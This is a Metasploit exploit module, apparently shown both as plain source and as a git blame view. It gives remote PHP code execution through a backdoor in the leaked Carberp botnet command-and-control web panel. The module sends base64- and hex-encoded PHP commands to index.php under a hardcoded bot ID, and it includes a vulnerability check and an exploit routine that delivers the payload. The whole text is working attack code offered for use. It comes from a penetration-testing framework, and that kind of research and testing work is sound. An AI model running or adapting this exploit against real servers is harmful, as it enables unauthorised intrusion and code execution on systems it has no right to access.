metasploit-framework/modules/exploits/unix/webapp/carberp_backdoor_exec.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			'Name'           => 'Carberp Web Panel C2 Backdoor Remote PHP Code Execution',
			'Description'    => %q{
					This module exploits backdoors that can be found all over the leaked
				source code of the Carberp botnet C2 Web Panel.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'bwall(Brian Wallace) <bwallace[at]cylance.com>', # msf module
					'connection(Luis Santana) <hacktalkblog[at]gmail.com>', # exploit reporting
					'Steven K <xylitol[at]malwareint[d0t]com>' # discovery and reporting
				],
			'References'     =>
				[
					['URL', 'http://www.xylibox.com/2013/06/carberp-remote-code-execution-carpwned.html']
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Keys'        => ['php'],
					'Space'       => 10000,
					'DisableNops' => true
				},
			'Platform'       => ['php'],
			'Arch'           => ARCH_PHP,
			'Targets'        =>
				[
					['carberp', {}]
				],
			'DisclosureDate' => 'Jun 28 2013',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('TARGETURI',[true, "The path to the backdoor, often just index.php", "/index.php"]),
				OptString.new('BOTID', [true, 'Hardcoded backdoor bot ID that can run PHP eval', 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV']),
			],self.class)
	end

	def check
		confirm_string = rand_text_alpha(8)
		cmd = "echo '#{confirm_string}';"
		shell = http_send_command(cmd)
		check_code = Exploit::CheckCode::Safe

		if shell and shell.body.include?(confirm_string)
			check_code = Exploit::CheckCode::Vulnerable
		end

		check_code
	end

	def http_send_command(cmd)
		uri = normalize_uri(target_uri.path.to_s)
		request_parameters = {
			'method'	=> 'POST',
			'uri'		=> uri,
			'vars_post'	=>
				{
					'id' => datastore['BOTID'],
					"data" => Rex::Text.encode_base64(cmd.unpack('H*'))
				}
		}
		res = send_request_cgi(request_parameters)

		res
	end

	def exploit
		http_send_command(payload.encoded)
	end
end
Carberp backdoor eval PoC 2013-06-28 21:47:13 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = GreatRanking`

			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => 'Carberp Web Panel C2 Backdoor Remote PHP Code Execution',`
			`'Description' => %q{`
Various description and title updates 2013-07-01 20:37:37 +00:00			`This module exploits backdoors that can be found all over the leaked`
Carberp backdoor eval PoC 2013-06-28 21:47:13 +00:00			`source code of the Carberp botnet C2 Web Panel.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'bwall(Brian Wallace) <bwallace[at]cylance.com>', # msf module`
			`'connection(Luis Santana) <hacktalkblog[at]gmail.com>', # exploit reporting`
Added Steven K's email 2013-06-28 22:31:17 +00:00			`'Steven K <xylitol[at]malwareint[d0t]com>' # discovery and reporting`
Carberp backdoor eval PoC 2013-06-28 21:47:13 +00:00			`],`
			`'References' =>`
			`[`
			`['URL', 'http://www.xylibox.com/2013/06/carberp-remote-code-execution-carpwned.html']`
			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Keys' => ['php'],`
			`'Space' => 10000,`
			`'DisableNops' => true`
			`},`
			`'Platform' => ['php'],`
			`'Arch' => ARCH_PHP,`
			`'Targets' =>`
			`[`
			`['carberp', {}]`
			`],`
			`'DisclosureDate' => 'Jun 28 2013',`
			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`OptString.new('TARGETURI',[true, "The path to the backdoor, often just index.php", "/index.php"]),`
			`OptString.new('BOTID', [true, 'Hardcoded backdoor bot ID that can run PHP eval', 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV']),`
			`],self.class)`
			`end`

			`def check`
			`confirm_string = rand_text_alpha(8)`
			`cmd = "echo '#{confirm_string}';"`
Applied some refactoring to decrease line count 2013-06-29 05:44:23 +00:00			`shell = http_send_command(cmd)`
Further refactoring requested 2013-06-29 16:45:22 +00:00			`check_code = Exploit::CheckCode::Safe`

			`if shell and shell.body.include?(confirm_string)`
			`check_code = Exploit::CheckCode::Vulnerable`
Carberp backdoor eval PoC 2013-06-28 21:47:13 +00:00			`end`
Further refactoring requested 2013-06-29 16:45:22 +00:00
			`check_code`
Carberp backdoor eval PoC 2013-06-28 21:47:13 +00:00			`end`

			`def http_send_command(cmd)`
			`uri = normalize_uri(target_uri.path.to_s)`
			`request_parameters = {`
			`'method' => 'POST',`
			`'uri' => uri,`
			`'vars_post' =>`
			`{`
			`'id' => datastore['BOTID'],`
			`"data" => Rex::Text.encode_base64(cmd.unpack('H*'))`
			`}`
			`}`
			`res = send_request_cgi(request_parameters)`
Make msftidy happy 2013-06-30 15:01:40 +00:00
Further refactoring requested 2013-06-29 16:45:22 +00:00			`res`
Carberp backdoor eval PoC 2013-06-28 21:47:13 +00:00			`end`

			`def exploit`
			`http_send_command(payload.encoded)`
			`end`
			`end`